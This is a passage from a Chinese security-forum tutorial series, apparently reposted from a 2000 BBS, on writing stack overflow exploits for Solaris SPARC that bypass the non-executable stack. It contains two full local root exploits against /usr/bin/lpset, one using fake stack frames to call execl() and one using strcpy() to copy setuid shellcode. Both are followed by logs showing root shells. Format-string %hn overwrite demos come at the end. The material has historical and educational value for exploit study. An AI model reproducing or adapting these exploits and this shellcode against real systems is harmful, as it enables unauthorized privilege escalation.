   麻烦的是execl()的第三个参数是0,因此我们不能将它通过参数传递，我们考虑另外一种
   方法：
   在环境变量中构造一个假的栈帧，将execl()用的参数放进去。
   这种方法也可以用来执行一串非leaf函数（构造多个假栈帧),只要将第二个要执行的函数
   的地址放到第一个函数栈帧的%i7中，并将第一个函数栈帧的%fp指向第二个函数的栈帧起
   始地址就行了。但是这种方法有一点要注意的就是我们需要跳过该非leaf函数的save指令
   。
   

堆栈低址
        __________
%fp    | %l0-%l7  | 8*4    保存main()的%l0-%l7寄存器
       |__________|
%fp+32 | %i0-%i5  | 6*4    保存main()的%i0-%i5寄存器
       |__________|
%fp+56 | %fp1     | 1*4  = 指向环境变量中的假栈帧   ---\
       |__________|                                    |
%fp+60 | %i7      | 1*4  = (execl()-4)                 |
       |__________|                                    |    返回到main之后，%fp指向假栈帧
                                                       |    %i7指向execl()-4，当从main返回的时候
环境变量：                                             |    因为ret指令相当于jmpl %i7+8, %g0，
        __________                                     |    于是进入execl流程；而restore会根据%fp
%fp1   | %l0-%l7  | 8*4  <-----------------------------/    恢复寄存器
       |__________|      
%fp1+32| %i0      | 1*4  = "/bin/sh"的地址
       |__________|      
%fp1+36| %i1      | 1*4  = "/bin/sh"的地址
       |__________|      
%fp1+40| %i2      | 1*4  = 0x00000000
       |__________|      
%fp1+44| %i3      | 1*4  = 任意数据
       |__________|      
%fp1+48| %i4      | 1*4  = 任意数据
       |__________|                                  
%fp1+52| %i5      | 1*4  = 任意数据
       |__________|      
%fp1+56| %fp2     | 1*4  = 指向下一个非leaf函数的假栈帧 --------> ....
       |__________|      
%fp1+60| %i7      | 1*4  = 下一个非leaf函数地址 - 4
       |__________|      

堆栈高址

   当我们覆盖掉main()函数的保存的%l和%i后，当func()执行第一个ret/resotre
   ，返回到main()里面，这时%fp就指向了环境变量中的假栈帧地址，%i7=(execl()-4)
   当main()函数再次执行ret/resotre时，%fp中保存的假栈帧内容被恢复到%l和%i寄存器
   里，这时候我们的execl()所需要的三个参数已经在%i0/%i1/%i2中了，而现在的%o0-%o7
   就是我们覆盖的main()函数的栈帧内容。如果按照原来的做法，现在应该跳到execl()
   处去执行，然后执行save指令，将%o再变成%i.但是既然我们所要的参数已经在%i中了，
   我们就不必再执行save指令了，所以我们原来填充的是(execl()-4),这样(%i7+8)=
   (execl()+4),刚好跳过save指令，而当我们执行完execl()返回的时候,ret/resotre指令
   会从%fp2所指的栈帧中恢复%i和%l,并跳到(%i7+8)处（也就是 (下一个非leaf函数地址
    + 4) )执行,以此类推，就可以顺序执行多个非leaf函数。

   注意：其实execl()正确执行完后是不会返回的，因此(%i7+8)通常并不会被执行到.
 （除非execl()执行失败).

   
   3.4  关于假栈帧地址的确定

   因此这里的一个关键问题是如何确定环境变量中假栈帧的地址，这个地址必须非常精确，
   否则execl()执行肯定会失败。我们使用execle()来调用有弱点的程序，execle()允许我
   们自己定制环境变量的内容，这样可以最大限度的消除不同用户由于环境变量不同而导
   致的假栈帧地址的差别。Solaris堆栈的最顶端总是包含程序的路径以及系统平台结构信
   息。例如：
   
   低址
   |
   |        __________ 
   |       | 堆栈区   |                           
   |       |__________|                           
   |       | 环境变量 |                           
   |       |__________|                               
   |sp_addr| 平台信息 |                           
   |       |__________|                           
   |       | 程序路径 |                           
   |       |__________|                           
   |       |0x00000000| 1*4   最后四个字节总是0   
   |       |__________|                           
   v0xffbf0000 (Solaris 7)                         
   高址                                           

   平台信息和程序路径的长度都可以确定，但是sp_addr的地址并不是简单的等同于
   0xffbf0000 - 4 - 平台信息长度 - 程序路径长度 - 2
   (2是前面两个字符串结尾的\0)
   而是还要再减去个偏移量，我测试了多次，这个值通常是0-5之间。

   简单的看个例子：
bash-2.03# gdb ./ex2
GNU gdb 4.18
<......>
(gdb) b main
Breakpoint 1 at 0x10c9c
(gdb) r
Starting program: /export/home/warning3/test/non/./ex2 

Breakpoint 1, 0x10c9c in main ()
(gdb) x/200s 0xffbeff00
<.......>
0xffbeff93:      "TERM=vt100"
0xffbeff9e:      "PATH=/usr/local/bin:/usr/sbin:/usr/bin"
0xffbeffc5:      "SUNW,Ultra-5_10"   <--- 平台信息，不同的机器可能不一样
0xffbeffd5:      "/export/home/warning3/test/non/ex2" <-- 路径信息
0xffbefff8:      ""
0xffbefff9:      ""
0xffbefffa:      ""
0xffbefffb:      ""
0xffbefffc:      ""
0xffbefffd:      ""
0xffbefffe:      ""
0xffbeffff:      ""
0xffbf0000:      
0xffbf0000:      
---Type  to continue, or q  to quit---q
Quit

(gdb) x/20x 0xffbeffc0
0xffbeffc0:     0x2f62696e      0x0053554e      0x572c556c      0x7472612d
0xffbeffd0:     0x355f3130      0x002f6578      0x706f7274      0x2f686f6d
0xffbeffe0:     0x652f7761      0x726e696e      0x67332f74      0x6573742f
0xffbefff0:     0x6e6f6e2f      0x65783200      0x00000000      0x00000000
0xffbf0000:     Cannot access memory at address 0xffbf0000.
(gdb) 

   3.5  一个实际的例子lpset_nonexec.c
   
   现在我们就可以来写一个新的测试程序了，还是以lpset为例：
--


            也许有一天，他再从海上蓬蓬的雨点中升起，
            飞向西来，再形成一道江流，再冲倒两旁的石壁，
            再来寻夹岸的桃花。然而，我不敢说来生，也不敢信来生......

※ 来源:．武汉白云黄鹤站 bbs.whnet.edu.cn．[FROM: 203.207.226.124]


--------------------------------------------------------------------------------

分类讨论区  全部讨论区  上一篇  本讨论区  回文章  下一篇 
发信人: scz (小四), 信区: Security
标  题: Solaris for SPARC 堆栈溢出程序编写(6)
发信站: 武汉白云黄鹤站 (Mon May 15 00:25:05 2000), 站内信件

---------------------------------------------------------------------------------
/*                ---> lpset_nonexec.c <---
 * expoit for lpset in Solaris 2.6/7 sparc version with non-exec-statck feature.
 *
 * It is one test for writing exploits in Sparc to defeat non-exec statck,
 * just for EDUCATIONAL purpose.:)
 * tested in Solaris 2.6/7 /sparc.
 * Usages: 
 *         ./lpset_nonexec    
 *                                               by warning3@hotmail.com
  *                                                          y2k/05/05
 */

#include 
#include 
#include 
#include 
#include 
#include 

#define VULPROG "/usr/bin/lpset"
#define SHELL "/bin/ksh"
#define PRINTER "blah"

#define BUFSIZE 944         /* the size of overflowed buffer*/
#define NOP     0xaa1d4015  /* "xor %l5, %l5, %l5" */ 

#define OFFSET  4           /* if don't work ,try adjust offst to 0 - 5 */ 

long get_sp(void)   

 {
        __asm__("mov %sp,%i0");
 } 


main( int argc, char **argv )

 {
 
         char *env[7];
         char fakeframe[512];
         char plat[256];

         void *handle;
         long execl_addr;


        char *pattern;

        long sh_addr, i, sp_addr,fp_addr, fp2_addr; 
        long bufsize=BUFSIZE, offset=OFFSET,  patternsize ;
        long  *addrptr;

        if( argc > 1 ) offset = atoi(argv[1]);
        if( argc > 2 ) bufsize = atoi(argv[2]);
       
        /* get plat info  */ 
        sysinfo(SI_PLATFORM,plat,256);
        
        sp_addr = (get_sp() | 0xffff) & 0xfffffffc;
        /* fp2_addr must be valid stack address */ 
        fp2_addr = (sp_addr & 0xfffffac0); 
        
        /* get shell string address */
        sh_addr =  sp_addr - strlen(VULPROG) - offset - strlen(plat)  - strlen(SHELL) -2 ;
        /* get our fake frame address */
        fp_addr = sh_addr  - 8*8 -1; 

        printf("Usages: %s     \n", argv[0] );
        printf("Using SHELL address = 0x%x  ,FP address = 0x%x, Offset = %d, Bufsize = %d\n",
                 sh_addr, fp_addr, offset, bufsize );
 
        if (!(handle=dlopen(NULL,RTLD_LAZY)))                                          
        {                                                                           
          fprintf(stderr,"Can't dlopen myself.\n");                                
          exit(1);                                                                 
        }                                                                           
                                                                                   
        if ((execl_addr=(long)dlsym(handle,"execl"))==NULL)                         
        {                                                                           
          fprintf(stderr,"Can't find execl().\n");                                 
          exit(1);                                                                 
        }                                         
                                          
        /* dec 4 to skip the 'save' instructure */                                                                           
        execl_addr -= 4;                                                            
        /* check if the exec addr includes zero  */                                                                           
        if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) ||                       
          !(execl_addr & 0xff0000) || !(execl_addr & 0xff000000))                  
        {                                                                           
          fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");       
          exit(1);                                                                 
        }                                                                           
                                                                                   
        printf("found execl() at 0x%lx\n",execl_addr);                              
                                                                                   
        
        patternsize = bufsize + 4*4 + 16*4 + 1;

        if((pattern = (char *)malloc(patternsize)) == NULL) {
           printf("Can't get enough memory!\n");
           exit(-1);
        }
        /* construct pattern buffer to overwrite the vul program */ 
        memset(pattern, 'C', patternsize );/* fill pattern buffer with garbage */
        memset(pattern+20, 0x3d, 1);  /* put '=' into buf, man lpset for why */
        addrptr = (long *) (pattern + bufsize + 4*4 ); 
        
        /* Let's overwrite caller function's saved stack frame 
           I know it's ugly,but just make it more clearly .:)
         */

        /* saved %l0-%l7 */

        *addrptr++ = fp_addr;       /* %l0 */ 
        *addrptr++ = fp_addr;       /* %l1 */ 
        *addrptr++ = fp_addr;       /* %l2 */ 
        *addrptr++ = fp_addr;       /* %l3 */ 
        *addrptr++ = fp_addr;       /* %l4 */ 
        *addrptr++ = fp_addr;       /* %l5 */ 
        *addrptr++ = fp_addr;       /* %l6 */ 
        *addrptr++ = fp_addr;       /* %l7 */ 

        /* saved %i0-%i7 */
        *addrptr++ = fp_addr;       /* %i0 */ 
        *addrptr++ = fp_addr;       /* %i1 */ 
        *addrptr++ = fp_addr;       /* %i2 */ 
        *addrptr++ = fp_addr;       /* %i3 */ 
        *addrptr++ = fp_addr;       /* %i4 */ 
        *addrptr++ = fp_addr;       /* %i5 */ 
        *addrptr++ = fp_addr;       /* saved %fp(%i6) */       
        *addrptr++ = execl_addr;    /* saved ret addr (%i7) */
        
        
        /* now we set up our fake stack frame */                                      
                                                                                             
        addrptr=(long *)fakeframe;
                                                                                             
        *addrptr++= 0x12345678; /* you can put any data in  local registers */                              
        *addrptr++= 0x12345678;                                                              
        *addrptr++= 0x12345678;                                                              
        *addrptr++= 0x12345678;                                                              
        *addrptr++= 0x12345678;                                                              
        *addrptr++= 0x12345678;                                                              
        *addrptr++= 0x12345678;                                                              
        *addrptr++= 0x12345678;                                                              
                                                                                             
        *addrptr++=sh_addr;      /* points to our string to exec */                           
        *addrptr++=sh_addr;      /* argv[1] is a copy of argv[0] */                                  
        *addrptr++=0x0;          /* NULL for execl();  &fakeframe[40] */                                        
        *addrptr++=fp2_addr;     /* &fakeframe[44] */                                                         
        *addrptr++=fp2_addr;                                                             
        *addrptr++=fp2_addr;                                                             
        *addrptr++=fp2_addr;     /* we need this address to work  */ 
        *addrptr++=fp2_addr; /* cause we don't need exec another func,so put garbage here */
        *addrptr++=0x0;                                                                      
                                                                                             
        /* Construct fake frame in environ */                                                
        /* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */                                                                                             
        env[0]=(fakeframe);     /* sh_addr|sh_addr|0x00                       */                                                              
        env[1]=&(fakeframe[40]);/*                     |0x00                  */                                                                                   
        env[2]=&(fakeframe[40]);/*                          |0x00             */                                                                                   
        env[3]=&(fakeframe[40]);/*                               |0x00        */                                                                                   
        env[4]=&(fakeframe[44]);/*                                    |fp2|fp2|fp2|fp2|fp2*/                                                                
        env[5]=SHELL;           /* shell strings */                                                                                                                                           
        env[6]=NULL;                                                                         

          /* adjust pattern size by printer length */
        execle(VULPROG, VULPROG,"-n","fns","-a", (pattern+strlen(PRINTER)-4), PRINTER,NULL,env);
 
 } 
---------------------------------------------------------------------------------

   再来测试一下：
   
bash-2.03$ gcc -o lpset_nonexec lpset_nonexec.c -ldl
bash-2.03$ ./lpset_nonexec
Usages: ./lpset_nonexec     
Using SHELL address = 0xffbeffd1  ,FP address = 0xffbeff90, Offset = 4, Bufsize = 944
found execl() at 0xff30da9c
# id
uid=100(warning3) gid=1(other) euid=0(root) <---- 成功了!

   注意：
   
   在不同的系统上(主要是硬件平台不同)，offset的值可能有不同，需要做一些调整.

--


            也许有一天，他再从海上蓬蓬的雨点中升起，
            飞向西来，再形成一道江流，再冲倒两旁的石壁，
            再来寻夹岸的桃花。然而，我不敢说来生，也不敢信来生......

※ 来源:．武汉白云黄鹤站 bbs.whnet.edu.cn．[FROM: 203.207.226.124]


--------------------------------------------------------------------------------

分类讨论区  全部讨论区  上一篇  本讨论区  回文章  下一篇 
发信人: scz (小四), 信区: Security
标  题: Solaris for SPARC 堆栈溢出程序编写(7)
发信站: 武汉白云黄鹤站 (Mon May 15 00:28:23 2000), 站内信件

   3.6  利用strcpy()拷贝shellcode

   如果你仍然非要用setuid(0),然后执行execl()的办法，我们再介绍一种方法，利用
   strcpy()将我们的shellcode拷贝到内存中的某些可写的部分去，然后跳到那里去执行。
   我们的做法是将我们的shellcode放到环境变量中，起始地址作为strcpy()的源地址，
   strcpy()的目的地址可以在可写可执行的非堆栈空间中找，然后将假栈帧中的%i7用这
   个目的地址代替。这样，当strcpy()完成拷贝后，程序就跳到(目的地址+8)处执行
   （在shellcode前面加几个NOP指令即可)。
   这里比较麻烦的是怎么找这个目的地址，Solaris 提供了几个显示进程内存信息的程序
   在/usr/proc/bin下面。/usr/proc/bin/pmap可以显示进程空间的映射情况。我们可以
   利用它来找到目的地址：

bash-2.03# gdb lpset
GNU gdb 4.18
<......>
(gdb) b main
Breakpoint 1 at 0x10de0
(gdb) r
Starting program: /usr/bin/lpset 
<.....>
(gdb) 
在另一个终端窗口查找lpset的pid,然后运行pmap:

bash-2.03# ps -ef|grep lpset
    root 14439     1  0 22:56:33 pts/3    0:00 /usr/bin/lpset
    
bash-2.03# /usr/proc/bin/pmap 14439
14439:  /usr/bin/lpset
00010000      8K read/exec         /usr/bin/lpset
00020000      8K read/write/exec   /usr/bin/lpset
FF3B0000    120K read/exec         dev:136,0 ino:100273
FF3DC000      8K read/write/exec   dev:136,0 ino:100273 <--- 这里是可写可执行的
FFBEC000     16K read/write          [ stack ]
 total      160K
bash-2.03# 

   我们可以将DEST定义为0xff3dc0c0,在Solaris 2.6下这个地址是不一样的。
   
   3.7  一个实际的例子lpset_nonexec1.c
   
   
   下面是测试程序，和前面那个差别不大，就不多说了，看看注释应该就明白了。

---------------------------------------------------------------------------------
/*                ---> lpset_nonexec2.c <---
 * expoit for lpset in Solaris 2.6/7 sparc version with non-exec-statck feature.
 * this exploit using strcpy() method.
 * It is one test for writing exploits in Sparc to defeat non-exec statck,
 * just for EDUCATIONAL purpose.:)
 * tested in Solaris 2.6/7 /sparc.
 * Usages: 
 *         gcc -o exn2 lpset_nonexec2.c -ldl
 *         ./exn2    
 *                                               by warning3@hotmail.com
 *                                                          y2k/05/05
 */

#include 
#include 
#include 
#include 
#include 
#include 

#define VULPROG "/usr/bin/lpset"
#define PRINTER "blah"

#define BUFSIZE 944         /* the size of overflowed buffer*/
#define EGGSIZE 1024        /* the egg buffer size */
#define NOP     0xaa1d4015  /* "xor %l5, %l5, %l5" */ 

#define OFFSET  4           /* if don't work ,try adjust offst to 0 - 5 */ 
#define DEST  0xff3dc0c0    /* in Solaris 7, the dest address that shellcode was strcpyed */ 
                            /* in Solaris 2.6 , #define DEST  0xef7fa0a0   */

char shellcode[] = /* from scz's funny shellcode for SPARC */ 
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"   /* setuid(0)  */          
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29" 
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

long get_sp(void)   

 {
        __asm__("mov %sp,%i0");
 } 


main( int argc, char **argv )

 {
 
    char *env[3];
    char fakeframe[512];
    char plat[256];

    void *handle;
    long strcpy_addr, dest_addr=DEST;


   char *pattern,eggbuf[EGGSIZE];

   long sh_addr, i, sp_addr,fp_addr, fp2_addr; 
   long bufsize=BUFSIZE, offset=OFFSET,  patternsize ;
   long  *addrptr;

   if( argc > 1 ) offset = atoi(argv[1]);
   if( argc > 2 ) bufsize = atoi(argv[2]);
  
   /* get plat info  */ 
   sysinfo(SI_PLATFORM,plat,256);
   
   sp_addr = (get_sp() | 0xffff) & 0xfffffffc;
   /* fp2_addr must be valid stack address */ 
   fp2_addr = (sp_addr & 0xfffffac0); 
   /* get shell string address */
   sh_addr =  sp_addr - strlen(VULPROG) - offset - strlen(plat)  - sizeof(eggbuf) -2 ;
   /* get our fake frame address */
   fp_addr = sh_addr  - 8*8 -1; 
   

   printf("Usages: %s     \n", argv[0] );
   printf("Using SHELL address = 0x%x  ,FP address = 0x%x, Offset = %d, Bufsize = %d\n", sh_addr, fp_addr, offset, bufsize );
 
   if (!(handle=dlopen(NULL,RTLD_LAZY)))                                          
   {                                                                           
     fprintf(stderr,"Can't dlopen myself.\n");                                
     exit(1);                                                                 
   }                                                                           
                                                                              
   if ((strcpy_addr=(long)dlsym(handle,"strcpy"))==NULL)                         
   {                                                                           
     fprintf(stderr,"Can't find strcpy().\n");                                 
     exit(1);                                                                 
   }                                         
                                     
   /* dec 4 to skip the 'save' instructure */                                                                           
   strcpy_addr -= 4;                                                            
   /* check if the exec addr includes zero  */                                                                           
   if (!(strcpy_addr & 0xff) || !(strcpy_addr * 0xff00) ||                       
     !(strcpy_addr & 0xff0000) || !(strcpy_addr & 0xff000000))                  
   {                                                                           
     fprintf(stderr,"the address of strcpy() contains a '0'. sorry.\n");       
     exit(1);                                                                 
   }                                                                           
                                                                              
   printf("found strcpy() at 0x%lx\n",strcpy_addr);                              
   printf("Use shellcode destination at 0x%lx\n",dest_addr);                                                                                  
   
   patternsize = bufsize + 4*4 + 16*4 + 1;

   if((pattern = (char *)malloc(patternsize)) == NULL) {
      printf("Can't get enough memory!\n");
      exit(-1);
   }
   /* construct pattern buffer to overwrite the vul program */ 
   memset(pattern, 'C', patternsize );/* fill pattern buffer with garbage */
   memset(pattern+20, 0x3d, 1);  /* put '=' into buf, man lpset for why */
   addrptr = (long *) (pattern + bufsize + 4*4 ); 
   
   /* Let's overwrite caller function's saved stack frame 
      I know it's ugly,but just make it more clearly .:)
    */

   /* saved %l0-%l7 */

   *addrptr++ = fp_addr;       /* %l0 */ 
   *addrptr++ = fp_addr;       /* %l1 */ 
   *addrptr++ = fp_addr;       /* %l2 */ 
   *addrptr++ = fp_addr;       /* %l3 */ 
   *addrptr++ = fp_addr;       /* %l4 */ 
   *addrptr++ = fp_addr;       /* %l5 */ 
   *addrptr++ = fp_addr;       /* %l6 */ 
   *addrptr++ = fp_addr;       /* %l7 */ 

   /* saved %i0-%i7 */
   *addrptr++ = fp_addr;       /* %i0 */ 
   *addrptr++ = fp_addr;       /* %i1 */ 
   *addrptr++ = fp_addr;       /* %i2 */ 
   *addrptr++ = fp_addr;       /* %i3 */ 
   *addrptr++ = fp_addr;       /* %i4 */ 
   *addrptr++ = fp_addr;       /* %i5 */ 
   *addrptr++ = fp_addr;       /* saved %fp(%i6) */       
   *addrptr++ = strcpy_addr;    /* saved ret addr (%i7) */
/*
返回到main的时候%i7指向strcpy-4，%fp指向假栈帧。从main返回的时候会执行
strcpy+4，从假栈帧会恢复i寄存器族，注意这里已经让开了save指令
*/
   
   /* now we set up our fake stack frame */                                      
                                                                                        
   addrptr=(long *)fakeframe;                                                           
                                                                                        
   *addrptr++= 0x12345678; /* you can put any data in  local registers */                              
   *addrptr++= 0x12345678;                                                              
   *addrptr++= 0x12345678;                                                              
   *addrptr++= 0x12345678;                                                              
   *addrptr++= 0x12345678;                                                              
   *addrptr++= 0x12345678;                                                              
   *addrptr++= 0x12345678;                                                              
   *addrptr++= 0x12345678;                                                              

   *addrptr++=dest_addr;      /* destination address */                           
   *addrptr++=sh_addr;        /* source address of shellcode */                                  
   *addrptr++=fp2_addr;       
   *addrptr++=fp2_addr;     
   *addrptr++=fp2_addr;                                                             
   *addrptr++=fp2_addr;                                                             
   *addrptr++=fp2_addr;     /* we need this address to work  */ 
   *addrptr++=dest_addr;    /* we will jump (dest_addr+8) to run */
   *addrptr++=0x0;                                                                      
/*
从strcpy返回后，%i7指向我们的shellcode+8，%fp乱指了些地方，是什么地方都无
所谓，可不可访问都无所谓，因为我们的shellcode不会执行restore指令的。
*/

   memset(eggbuf,'A',EGGSIZE);   /* fill the eggbuf with garbage */
   for (i = 0; i < EGGSIZE; i+=4) /* fill with NOP */ 
   {
      eggbuf[i+3]=NOP & 0xff;
      eggbuf[i+2]=(NOP >> 8 ) &0xff;
      eggbuf[i+1]=(NOP >> 16 ) &0xff;
      eggbuf[i+0]=(NOP >> 24 ) &0xff;  /* Big endian */ 
    }
    /* Notice : we assume the length of shellcode can be divided exatcly by 4 .
       If not, exploit will fail. Anyway, our shellcode is. ;-)
     */     
    memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4  , shellcode, strlen(shellcode));
   /* Construct fake frame in environ */                                                
   env[0]=(fakeframe);     /* dest_addr|sh_addr|fp2|fp2|fp2|fp2|fp2|dest_addr */                                                              
   env[1]=eggbuf;                                                                                                                                              
   env[2]=NULL;                                                                         

     /* adjust pattern size by printer length */
   execle(VULPROG, VULPROG,"-n","fns","-a", (pattern+strlen(PRINTER)-4), PRINTER,NULL,env);
 
} /* end of main */
---------------------------------------------------------------------------------------------------
测试一下：
bash-2.03$ gcc -o exn2 lpset_nonexec2.c -ldl
bash-2.03$ ./exn2
Usages: ./exn2     
Using SHELL address = 0xffbefbd9  ,FP address = 0xffbefb98, Offset = 4, Bufsize = 944
found strcpy() at 0xff2b6960
Use shellcode destination at 0xff3dc0c0
sh: C: not found
# id
uid=0(root) gid=1(other)      <---- 成功！

--


            也许有一天，他再从海上蓬蓬的雨点中升起，
            飞向西来，再形成一道江流，再冲倒两旁的石壁，
            再来寻夹岸的桃花。然而，我不敢说来生，也不敢信来生......

※ 来源:．武汉白云黄鹤站 bbs.whnet.edu.cn．[FROM: 203.207.226.124]


--------------------------------------------------------------------------------

分类讨论区  全部讨论区  上一篇  本讨论区  回文章  下一篇 
发信人: scz (小四), 信区: Security
标  题: Solaris for SPARC 堆栈溢出程序编写(8)
发信站: 武汉白云黄鹤站 (Mon May 15 00:29:50 2000), 站内信件

4. 结束语
   
   上面只是介绍一些基本的方法和思路，在实际应用的时候，还可能会碰到很多问题。
   例如，有些情况下，%i0-%i5的值是不能随便填的，否则将导致函数不能正常返回，
   只能具体情况具体分析。毕竟这只是入门性质的文章，抛块砖头罢了。
     
   感谢能看到这里的朋友，谢谢您的耐心.
   感谢5.1这么长的假期，让我有时间写点东西。 :-)
   

5. 参考文献：
     

[1]. <>,horizon      
[2]. << ex_lpset.c Overflow Exploits( for Intel Edition )>>,The Shadow Penguin Security
[3]. <>,Peter Magnusson.
[4]. <>,Arthur B. Maccabe,Jeff Vandyke 

<<完>>
--


            也许有一天，他再从海上蓬蓬的雨点中升起，
            飞向西来，再形成一道江流，再冲倒两旁的石壁，
            再来寻夹岸的桃花。然而，我不敢说来生，也不敢信来生......

※ 来源:．武汉白云黄鹤站 bbs.whnet.edu.cn．[FROM: 203.207.226.124]


--------------------------------------------------------------------------------

◆ Solaris for SPARC 堆栈溢出程序编写（续） 
 
作者：warning3 < warning3@nsfocus.com > 
主页：http://www.nsfocus.com/ 
日期：2000-11-14 

    前言：

   这篇文章是“Solaris for SPARC 堆栈溢出程序编写”的续篇。主要是介绍
   了一些新的方式以及技巧。包括在SPARC下进行格式串攻击以及准确定位
   shellcode的技巧。

目录：

1. SPARC平台下的格式串攻击     
2. 准确定位shellcode
3. 利用格式串攻击突破Solaris不可执行堆栈保护


内容：
  
1. SPARC平台下的格式串攻击 

  在SPARC平台下进行格式串攻击与在x86平台下基本相同。原理请参见"*printf
  ()格式化串安全漏洞分析"一文，这里不再赘述。所不同的地方有两处：
  
  (1) 由于SPARC平台数据存储采用的是"big-endian"方式, 高位字节在较低的
  地址上，这与Intel x86的存储方式相反。因此在进行覆盖的时候要注意顺序。
  
  (2) SPARC平台下很多操作都要求参数的地址必须是能被4整除的，即要求边
  界堆齐。"%n"操作就要求覆盖的地址边界对齐。使用gdb跟踪得到该指令为：
  
  st  %o0, [ %o1 ]

  因此我们不能使用以前的那种多次覆盖的方法: 分别覆盖retloc, retloc+1, 
  retloc+2, retloc+3。 因为retloc+1/retloc+2/retloc+3肯定是不能被4整
  除的。
  
  另外"%n"对能覆盖的长度是有限制的，如果打印长度超过0xe0000000(在
  Solaris 7下，这个长度是肯定不行的，确切的边界我没有仔细试)，似乎
  Solaris会忽略打印长度。通常在Solaris 2.6下，堆栈地址高于0xefff0000, 
  Solaris 7下堆栈地址高于0xffbe0000. 因此如果我们的shellcode地址是在
  堆栈中，利用"%n"的方法是不能成功进行覆盖的。
  
  唯一的办法，似乎只有利用"%hn"进行攻击了。开始我以为"%hn"也不能对
  retloc+2这样的地址(它也不能被四整除)操作，但幸运的是，测试表明，担
  心是多余的。看起来"%hn"只要求地址能被2整除，如果地址不能被2整除，
  也会出"Bus Error"错误. （用gdb跟踪得到的指令为： sth  %o2, [ %o1 ]）
  
  下面是我写的三个很简单的测试程序：
  
  /*  tt.c  -- use "%hn" to overwrite retloc
   *  这个程序假设我们的shellcode地址在0xffbeffac, 使用"%hn"来将这个
   *  地址写到变量retloc中去。
   */
  main()
{
   long retloc = 0;
   long shell_addr = 0xffbeffac, reth, retl;
   char buf[256], buf1[256];
   
   reth = (shell_addr >> 16) & 0xffff ;
   retl = (shell_addr >>  0) & 0xffff ;
   
   printf("Shell address = 0x%.8x\n", shell_addr);
   /* 这里retl - reth还要加上0x10000是为了保证即使retl<reth,覆盖结果
    * 也是正确的.
    * 注意Big-endian下覆盖顺序不同. 
    */
   sprintf(buf, "%%.%uu%%hn%%%uc%%hn", reth , retl - reth + 0x10000);
   printf("Before overwrite: retloc = 0x%.8x\n", retloc);
   snprintf(buf1, 255 , buf, 'A', &retloc, 'B', (char *)(&retloc) + 2 );
   printf("buf1 = %s\n",buf1);
   printf("After overwrite: retloc = 0x%.8x\n", retloc);

  }

  运行结果：
  [warning3@sun1 non-exec]$ gcc -o tt tt.c;./tt
  Shell address = 0xffbeffac
  Before overwrite: retloc = 0x00000000
  buf1 = 0000000000000000000000000000000000000000000000000000000000000
  00000000000000000000000000000000000000000000000000000000000000000000
  00000000000000000000000000000000000000000000000000000000000000000000
  000000000000000000000000000000000000000000000000000000000
  After overwrite: retloc = 0xffbeffac
  
  我们看到覆盖成功了。
  
  /*  tt1.c  -- use "%n" to overwrite retloc
   *  这个程序假设我们的shellcode地址在0xffbeffac, 使用"%n"来将这个
   *  地址写到变量retloc中去。
   */  
  main()
{
   long retloc = 0;
   long shell_addr = 0xffbeffac, reth, retl;
   char buf[256], buf1[256];
   
   printf("Shell address = 0x%.8x\n", shell_addr);
   sprintf(buf, "%%.%uu%%n", shell_addr);
   
   printf("Before overwrite: retloc = 0x%.8x\n", retloc);
   snprintf(buf1, 255 , buf ,'A', &retloc);
   printf("buf1 = %s\n",buf1);
   printf("After overwrite: retloc = 0x%.8x\n", retloc);
   
  }
  运行结果：
  [warning3@sun1 non-exec]$ gcc -o tt1 tt1.c;./tt1
  Shell address = 0xffbeffac
  Before overwrite: retloc = 0x00000000
  buf1 = 65
  After overwrite: retloc = 0x00000002
  
  我们看到retloc的值变成了2,而不是我们预料的0xffbeffac.
  buf1中显示的字符串也是 "65" (0x41),看起来如果打印长度过长，会忽略打
  印长度设置。
  
  /*  tt2.c  -- use multi "%n"s to overwrite retloc
   *  这个程序假设我们的shellcode地址在0xffbeffac, 使用多次"%n"覆盖的
   *  方法来将这个地址写到变量retloc中去。
   */    
   main()
  {
   long retloc = 0;
   long shell_addr = 0xffbeffac;
   int SH1, SH2, SH3, SH4;
   char buf[256], buf1[256];
   
   SH1 = (shell_addr >> 24) & 0xff;
   SH2 = (shell_addr >> 16) & 0xff;
   SH3 = (shell_addr >>  8) & 0xff;
   SH4 = (shell_addr >>  0) & 0xff;
   
   printf("Shell address = 0x%.8x\n", shell_addr);
   /* 注意Big-endian下覆盖顺序不同 */
   sprintf(buf, "%%.%uu%%n%%.%uu%%n%%.%uu%%n%%.%uu%%n", SH1, SH2 - SH1 + 0x100
                 ,SH3 - SH2 + 0x200, SH4 - SH3 + 0x300 );
   
   printf("Before overwrite: retloc = 0x%.8x\n", retloc);
   snprintf(buf1, 255 , buf ,'A', &retloc, 'A', (char *)(&retloc)+1, 
                 'A', (char *)(&retloc)+2, 'A', (char *)(&retloc)+3  );
   printf("buf1 = %s\n",buf1);
   printf("After overwrite: retloc = 0x%.8x\n", retloc);

  }
  
  运行结果： 
  在Solaris 7下，运行时得到总线错误：
  [warning3@sun1 non-exec]$ gcc -o tt2 tt2.c;./tt2
  Shell address = 0xffbeffac
  Before overwrite: retloc = 0x00000000
  Bus Error
  
  在Redhat 6.1下，运行结果正确：
  [warning3@redhat-6 warning3]$ gcc -o tt2 tt2.c;./tt2
  Shell address = 0xffbeffac
  Before overwrite: retloc = 0x00000000
  buf1 = 000000000000000000000000000000000000000000000000000000000000
  0000000000000000000000000000000000000000000000000000000000000000000
  0000000000000000000000000000000000000000000000000000000000000000000
  000000000000000000000000000000000000000000000000000000000006
  After overwrite: retloc = 0xacffbeff <--注意在x86下是反序的
  
  有了上面的一番分析我们就可以利用"%hn"来编写SPARC平台下的格式串攻击
  程序了。只要注意一下我提到的两点，写起来就和x86下的程序很相像了。
  稍后我会提供一个实例。

2. 准确定位shellcode

  如何在SPARC平台下准确定位shellcode的地址一直是让我很头疼的问题。因
